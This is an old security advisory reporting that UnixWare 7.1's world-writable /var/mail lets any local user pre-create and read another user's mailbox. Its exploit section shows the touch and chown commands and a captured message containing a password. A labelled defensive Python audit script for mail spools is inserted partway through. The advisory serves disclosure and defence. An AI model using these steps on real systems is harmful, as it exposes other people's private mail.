unixware7.mail.txt

1999-12-06T00:00:00
ID PACKETSTORM:11272
Type packetstorm
Reporter Brock Tellier
Modified 1999-12-06T00:00:00

Description

Greetings,  
  
OVERVIEW  
Any user can read/modify others' mail.  
  
BACKGROUND  
Only UnixWare 7.1 was tested.  
  
DETAILS  
Imagine my surprise when I saw that /var/mail was mode 777. As such, any  
user may create a file called /var/mail/<username> with a mode readable by  
him and trap all incoming mail. Afraid of getting caught? chown the file  
to <username> (see my advisory on this subject), leaving it still  
world-readable, and no one will ever know who did it.   
  
  
All of this assumes, of course, that the user has not received any mail  
yet. If you keep track of your /etc/passwd file, you can monitor for new  
entries and create the files as needed.  
  
This permissions problem obviously opens the door for all sorts of  
problems with symlinks and such. I would imagine that some mail delivery  
programs which aren't as smart as sendmail will follow symlinks in  
/var/mail.  
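As an added example (not part of Brock Tellier's advisory), here is a small audit script that checks a mail spool for the conditions described above from the defender's side: a world-writable spool directory, mailbox files whose owner does not match the user they are named after, mailboxes readable or writable by other users, symlinks sitting in the spool, and mailbox files named for accounts that do not exist. The usernames, the temporary spool directory it builds and the username-to-uid mapping are all constructed for illustration; on a real system the mapping would come from the pwd module and the path would be /var/mail.

```python
"""Audit an mbox-style mail spool (one file per recipient) for hijack conditions.

Added example, not the advisory's own code. Assumes the spool is a directory of
files named after their recipients and that the caller supplies the expected
username -> uid mapping (from pwd.getpwall() on a live system).
"""
import os
import stat
import tempfile

# Permission bits a per-user mailbox should never carry: anything for group/other.
MAILBOX_LEAK_BITS = stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH


def check_spool_dir(mode):
    """Findings about the spool directory itself; `mode` is its lstat st_mode."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("spool: world-writable (mode %04o); any user can pre-create "
                        "<user> mailboxes or plant symlinks" % stat.S_IMODE(mode))
    return findings


def check_mailbox(name, mode, uid, users):
    """Findings for one spool entry.

    `mode` and `uid` must come from lstat so a symlink is seen as a symlink,
    not as whatever it points at. `users` maps username -> expected owner uid.
    """
    findings = []
    if stat.S_ISLNK(mode):
        findings.append("%s: is a symlink; a delivery agent that follows it "
                        "writes somewhere else" % name)
        return findings
    if not stat.S_ISREG(mode):
        findings.append("%s: not a regular file" % name)
        return findings
    expected = users.get(name)
    if expected is None:
        findings.append("%s: no such user; stray or attacker-created mailbox" % name)
    elif uid != expected:
        findings.append("%s: owned by uid %d, expected %d (pre-created by "
                        "another user?)" % (name, uid, expected))
    if mode & MAILBOX_LEAK_BITS:
        # Catches the chown-to-victim variant: owner looks right, but the file
        # was left world-readable so the planter can still read the mail.
        findings.append("%s: mode %04o lets other users read or write this mailbox"
                        % (name, stat.S_IMODE(mode)))
    return findings


def audit_mail_spool(spool_dir, users):
    """Walk a spool directory; an empty list means nothing was found."""
    findings = check_spool_dir(os.lstat(spool_dir).st_mode)
    for name in sorted(os.listdir(spool_dir)):
        st = os.lstat(os.path.join(spool_dir, name))
        findings.extend(check_mailbox(name, st.st_mode, st.st_uid, users))
    return findings


def build_demo_spool():
    """Constructed fixture, not real data: a mode-777 spool holding a correct
    0600 mailbox (alice), a world-readable pre-created mailbox (btellier), a
    mailbox for a non-existent account (nosuchuser) and a symlink (carol).
    All files are owned by the current uid, since chown needs root.
    Returns (spool_path, users)."""
    me = os.getuid()
    spool = tempfile.mkdtemp(prefix="mailspool-")
    os.chmod(spool, 0o777)  # the permission the advisory found on /var/mail
    users = {"alice": me, "btellier": me, "carol": me}
    for name, mode in (("alice", 0o600), ("btellier", 0o644), ("nosuchuser", 0o644)):
        path = os.path.join(spool, name)
        os.close(os.open(path, os.O_CREAT | os.O_WRONLY, mode))
        os.chmod(path, mode)  # explicit chmod so the umask cannot alter the fixture
    os.symlink("/dev/null", os.path.join(spool, "carol"))
    return spool, users


if __name__ == "__main__":
    spool, users = build_demo_spool()
    for line in audit_mail_spool(spool, users):
        print(line)
```

On a production host you would call audit_mail_spool("/var/mail", {p.pw_name: p.pw_uid for p in pwd.getpwall()}) from cron and alert on any output; a clean spool is mode 775 root:mail (or 1777 only where the delivery agent itself refuses to follow symlinks and creates mailboxes atomically), with every mailbox 0600 and owned by its recipient.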
  
And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG  
LIE:  
  
bash-2.02$ cat /usr/bin/mail  
#!/bin/sh  
cat > /dev/null  
exit 0  
bash-2.02$   
  
;)  
  
EXPLOIT  
  
bash-2.02$ id  
uid=106(xnec) gid=1(other)  
bash-2.02$ pwd  
/var/mail  
bash-2.02$ touch btellier  
bash-2.02$ chown btellier btellier  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier  
  
Now wait for btellier to get some mail...  
  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier  
bash-2.02$ cat btellier  
From root Sat Dec 4 07:55:29 1999  
Return-Path: root  
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842  
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
From: root@localhost  
Message-Id: <199912041355.HAA04842@localhost>  
Status:   
  
X-Status:   
  
X-SCO-PAD: XXXXXX  
X-SCO-UID: 1  
Content-Length: 52  
  
your ueber-secure password on 0wned.com is a@f9;se0  
bash-2.02$   
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
btellier@usa.net  
  
  